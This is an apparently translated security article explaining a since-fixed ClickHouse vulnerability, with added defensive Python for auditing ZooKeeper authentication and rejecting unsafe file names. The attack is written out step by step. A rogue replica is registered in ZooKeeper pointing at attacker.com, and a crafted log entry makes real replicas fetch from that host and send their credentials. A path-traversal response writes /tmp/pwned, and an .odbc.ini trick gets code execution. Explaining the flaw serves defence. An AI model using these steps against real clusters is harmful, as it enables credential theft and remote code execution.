Why you need to keep the zoo's cages closed


This article tells the story of a very specific vulnerability in the ClickHouse replication protocol, and also shows how the attack surface can be widened.

ClickHouse is a database for storing large volumes of data, most often run with more than one replica. Clustering and replication in ClickHouse are built on top of Apache ZooKeeper (ZK) and require write access to it.

A default ZK installation requires no authentication, so thousands of ZK servers used to coordinate Kafka, Hadoop and ClickHouse are reachable from the public internet.

To reduce your attack surface, you should always configure authentication and authorization when you install ZooKeeper.
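As an added illustration of that advice (this is not code from the article or from the ClickHouse project), the following script audits a ClickHouse server configuration for ZooKeeper authentication. It assumes a 19.x-style config.xml with a `<yandex>` root and uses the documented `<zookeeper><identity>user:password</identity>` setting, which is what ClickHouse presents to ZooKeeper's digest scheme; the two config strings are constructed for the example, and the 16-character minimum password length is an arbitrary policy choice. Setting the identity on the ClickHouse side only helps if the ZooKeeper side also restricts the `/clickhouse` subtree with ACLs bound to that identity.

```python
import xml.etree.ElementTree as ET

# Constructed example configs (not from the article). The first one talks to the
# ZooKeeper ensemble with no credentials at all; the second sets a digest identity.
WEAK_CONFIG = """<yandex>
  <zookeeper>
    <node><host>zk1.internal</host><port>2181</port></node>
    <node><host>zk2.internal</host><port>2181</port></node>
  </zookeeper>
</yandex>"""

HARDENED_CONFIG = """<yandex>
  <zookeeper>
    <node><host>zk1.internal</host><port>2181</port></node>
    <node><host>zk2.internal</host><port>2181</port></node>
    <identity>clickhouse:REPLACE_WITH_STRONG_SECRET</identity>
  </zookeeper>
</yandex>"""

MIN_PASSWORD_LEN = 16  # policy assumption for this example, not a ClickHouse rule


def zookeeper_auth_findings(config_xml: str) -> list[str]:
    """Return a list of human-readable findings about the <zookeeper> section.

    An empty list means either no ZooKeeper is configured (nothing to replicate
    through) or the section carries a well-formed user:password identity.
    """
    root = ET.fromstring(config_xml)
    zk = root.find("zookeeper")
    if zk is None:
        return []

    findings: list[str] = []
    if not zk.findall("node"):
        findings.append("zookeeper section has no <node> entries")

    identity = (zk.findtext("identity") or "").strip()
    if not identity:
        findings.append(
            "no <identity> set: ClickHouse will use the ZooKeeper ensemble "
            "without authentication; anyone who can reach ZK can rewrite "
            "replica metadata and the DDL queue"
        )
        return findings

    user, sep, password = identity.partition(":")
    if not sep or not user or not password:
        findings.append("<identity> must have the form user:password (ZooKeeper digest scheme)")
    elif len(password) < MIN_PASSWORD_LEN:
        findings.append(f"ZooKeeper password shorter than {MIN_PASSWORD_LEN} characters")
    return findings


def audit_file(path: str) -> list[str]:
    """Convenience wrapper for a real config.xml on disk."""
    with open(path, encoding="utf-8") as fh:
        return zookeeper_auth_findings(fh.read())


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, zookeeper_auth_findings(cfg) or ["ok"])
```

Run it against `/etc/clickhouse-server/config.xml` with `audit_file`; a finding about a missing `<identity>` means the replication metadata described in the rest of this article can be rewritten by anyone with network access to the ensemble.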

There are of course Java deserialization 0days too, but let us simply assume that the attacker can read from and write to the ZooKeeper used for ClickHouse replication.

When configured in cluster mode, ClickHouse supports distributed DDL queries that are passed through ZK; for them, nodes are created in the /clickhouse/task_queue/ddl list.

For example, you create the node /clickhouse/task_queue/ddl/query-0001 with the contents:

version: 1
query: DROP TABLE xxx ON CLUSTER test;
hosts: ['host1:9000', 'host2:9000']

and after that the test table will be dropped on the cluster servers host1 and host2. The DDL queue also supports CREATE/ALTER/DROP queries.

Sounds scary? But where would an attacker get the server addresses?

ClickHouse replication works at the level of individual tables, so when a table is created, the server that will be responsible for exchanging metadata with the other replicas is registered in ZK. For example, when executing the query (ZK must be configured; chXX is the replica name, foobar is the table name):

CREATE TABLE foobar
(
    `action_id` UInt32 DEFAULT toUInt32(0),
    `status` String
)
ENGINE=ReplicatedMergeTree(
'/clickhouse/tables/01-01/foobar/', 'chXX')
ORDER BY action_id;

the nodes columns and metadata will be created.

Contents of /clickhouse/tables/01/foobar/replicas/chXX/hosts:

host: chXX-address
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Is it possible to pull data from this host? Yes, if the replication port (TCP/9009) on the server chXX-address is not closed by a firewall and replication authentication is not configured. So how is the authentication bypassed?

An attacker can register a new replica in ZK by copying the contents of /clickhouse/tables/01-01/foobar/replicas/chXX and changing the value of host.

Contents of /clickhouse/tables/01-01/foobar/replicas/attacker/host:

host: attacker.com
port: 9009
tcp_port: 9000
database: default
table: foobar
scheme: http

Next, the other replicas have to be told that a new data part exists on the attacker's server and that they need to fetch it; for this a node /clickhouse/tables/01-01/foobar/log/log-00000000XX is created in ZK (XX is a monotonically increasing counter, which must be greater than the last entry in the event log):

format version: 4
create_time: 2019-07-31 09:37:42
source replica: attacker
block_id: all_7192349136365807998_13893666115934954449
get
all_0_0_2

where source replica is the name of the attacker's replica created in the previous step, block_id is the identifier of the data block, and get is the "get block" command (the commands for the other operations are listed here).

After that, every replica reads the new event from the log and goes to the attacker-controlled server to fetch the "block of data" (the replication protocol is binary and runs over HTTP). The server attacker.com will receive requests like:

POST /?endpoint=DataPartsExchange:/clickhouse/tables/01-01/default/foobar/replicas/chXX&part=all_0_0_2&compress=false HTTP/1.1
Host: attacker.com
Authorization: XXX

where XXX is the authentication data for replication. In some cases this can be an account that also has access to the database through the native ClickHouse protocol and the HTTP protocol. As you can see, the attack surface becomes very large simply because the ZooKeeper used for replication was left without authentication configured.

Let us look at the function that fetches a data part from a replica. It was written with complete confidence that all replicas are under proper control and that there is trust between them.

[Screenshot: the replication code]

The procedure reads the number of files, then for each file its name, size and contents, and writes them to the file system. It is worth describing separately how data is laid out on the file system.

There are several subdirectories in /var/lib/clickhouse (the default storage path from the configuration file):

flags - directory for flag files used for recovery after data loss;
tmp - directory for temporary files;
user_files - file operations in queries (INTO OUTFILE and others) are restricted to this directory;
metadata - sql files with the table definitions;
preprocessed_configs - processed configuration files taken from /etc/clickhouse-server;
data - the directory with the data itself; a separate subdirectory is created here for every database (for example /var/lib/clickhouse/data/default).

For each table, a separate subdirectory is created inside the database directory. Each column has its own file, depending on the engine format. For example, for the foobar table created above, the following files will be created:

action_id.bin
action_id.mrk2
checksums.txt
columns.txt
count.txt
primary.idx
status.bin
status.mrk2

While processing the "block of data", the replica expects to receive files with exactly these names, and it does not validate them in any way.

The attentive reader has surely already noticed the unsafe concatenation of file_name in the WriteBufferFromFile call. Yes, this lets an attacker write arbitrary contents to any file on the file system that the clickhouse user has write access to. To do so, the attacker-controlled replica has to answer the request with the following response (line breaks inserted for readability):

x01
x00x00x00x00x00x00x00x24
../../../../../../../../../tmp/pwned
x12x00x00x00x00x00x00x00
hellofromzookeeper

and after concatenation with ../../../../../../../../../tmp/pwned the file /tmp/pwned will be written with the contents hellofromzookeeper.
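To make the missing check concrete, here is an added example of a receiver for the "block of data" response that refuses file names it has no business writing. This is not ClickHouse's code; it assumes a simplified wire format taken from the response shown above (one count byte, then for each file an 8-byte length, the name, an 8-byte length and the contents) with little-endian lengths, and it assumes a fixed part directory path. The malicious and benign responses are constructed inline; the 36-byte name length matches the x24 in the response above.

```python
import posixpath

# Files a ReplicatedMergeTree part for the article's foobar table is expected
# to contain (columns action_id and status). The receiver should never write
# any other name into the part directory.
EXPECTED_PART_FILES = frozenset({
    "action_id.bin", "action_id.mrk2", "status.bin", "status.mrk2",
    "checksums.txt", "columns.txt", "count.txt", "primary.idx",
})

# Assumed destination directory for the part (example value, not from the article).
PART_DIR = "/var/lib/clickhouse/data/default/foobar/all_0_0_2"


def _read_blob(buf: bytes, pos: int) -> tuple[bytes, int]:
    """Read an 8-byte little-endian length followed by that many bytes."""
    if pos + 8 > len(buf):
        raise ValueError("truncated length field")
    n = int.from_bytes(buf[pos:pos + 8], "little")
    pos += 8
    if pos + n > len(buf):
        raise ValueError("truncated payload")
    return buf[pos:pos + n], pos + n


def validate_part_file_name(name: str, allowed=EXPECTED_PART_FILES, part_dir=PART_DIR) -> str:
    """Return the absolute target path for name, or raise ValueError.

    Order matters: structural checks first (no separators, NUL or dot segments),
    then the allow-list, then a final normalized-path containment check so that
    a mistake in the earlier rules still cannot escape part_dir.
    """
    if not name or "\x00" in name:
        raise ValueError("empty file name or NUL byte")
    if "/" in name or "\\" in name or name in (".", ".."):
        raise ValueError(f"path separator or dot segment in file name: {name!r}")
    if name not in allowed:
        raise ValueError(f"file not expected in a data part: {name!r}")
    target = posixpath.normpath(posixpath.join(part_dir, name))
    if posixpath.dirname(target) != posixpath.normpath(part_dir):
        raise ValueError(f"file name escapes the part directory: {name!r}")
    return target


def parse_part_response(data: bytes, allowed=EXPECTED_PART_FILES) -> dict[str, bytes]:
    """Decode a response into {file_name: contents}, rejecting unsafe names."""
    if not data:
        raise ValueError("empty response")
    count, pos = data[0], 1
    files: dict[str, bytes] = {}
    for _ in range(count):
        raw_name, pos = _read_blob(data, pos)
        name = raw_name.decode("utf-8")  # UnicodeDecodeError is a ValueError
        validate_part_file_name(name, allowed)
        contents, pos = _read_blob(data, pos)
        files[name] = contents
    if pos != len(data):
        raise ValueError("trailing bytes after last file")
    return files


def encode_part_response(files: dict[str, bytes]) -> bytes:
    """Inverse of parse_part_response, used to build the constructed samples."""
    out = bytes([len(files)])
    for name, contents in files.items():
        raw = name.encode("utf-8")
        out += len(raw).to_bytes(8, "little") + raw
        out += len(contents).to_bytes(8, "little") + contents
    return out


def is_rejected(data: bytes) -> bool:
    """True if the receiver refuses the response."""
    try:
        parse_part_response(data)
    except ValueError:
        return True
    return False


# Constructed samples: the traversal payload from the article, and a benign part.
MALICIOUS_RESPONSE = encode_part_response(
    {"../../../../../../../../../tmp/pwned": b"hellofromzookeeper"})
BENIGN_FILES = {"columns.txt": b"columns format version: 1\n2 columns:\n`action_id` UInt32\n`status` String\n",
                "count.txt": b"0"}
BENIGN_RESPONSE = encode_part_response(BENIGN_FILES)

if __name__ == "__main__":
    print("malicious rejected:", is_rejected(MALICIOUS_RESPONSE))
    print("benign files:", sorted(parse_part_response(BENIGN_RESPONSE)))
```

The allow-list is the strongest of the three rules, because a replica legitimately knows which column files a part must contain; the separator and normalized-path checks are there so that the receiver stays safe even if the allow-list is later relaxed to a pattern.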

There are several ways to turn the ability to write a file into remote code execution (RCE).

External dictionaries to RCE

In older versions, the directory with the ClickHouse settings was stored with the permissions of the default clickhouse user. The settings are XML files that the service reads at startup and then caches in /var/lib/clickhouse/preprocessed_configs. When they change, they are re-read. With write access to /etc/clickhouse-server, an attacker can define their own external dictionary of the executable type and thus run arbitrary code. Current ClickHouse versions no longer grant these permissions, but if a server has been upgraded step by step, such permissions may have survived. If you maintain a ClickHouse cluster, check the permissions on the configuration directory: it must belong to the root user.

ODBC to RCE

When the package is installed, the clickhouse user is created, but its home directory /nonexistent is not. Nevertheless, when using external dictionaries, or for other reasons, administrators create the /nonexistent directory and give the clickhouse user write access to it (SSZB! translator's note).

ClickHouse supports ODBC and can connect to other databases. In ODBC, you can specify the path to the database driver library (.so). Older versions of ClickHouse allowed this to be done directly in the query handler, but a stricter check of the connection string has since been added to odbc-bridge, so the driver path can no longer be set from the query. But what if the attacker can write to the home directory using the vulnerability described above?

Let us create the file ~/.odbc.ini with contents like these:

[lalala]
Driver=/var/lib/clickhouse/user_files/test.so

and then, when SELECT * FROM odbc('DSN=lalala', 'test', 'test'); is run, the test.so library will be loaded and RCE obtained (thanks to the bug reporter for the tip).

This and other vulnerabilities were fixed in ClickHouse version 19.14.3. Keep an eye on your ClickHouses and ZooKeepers!

Source: www.habr.com
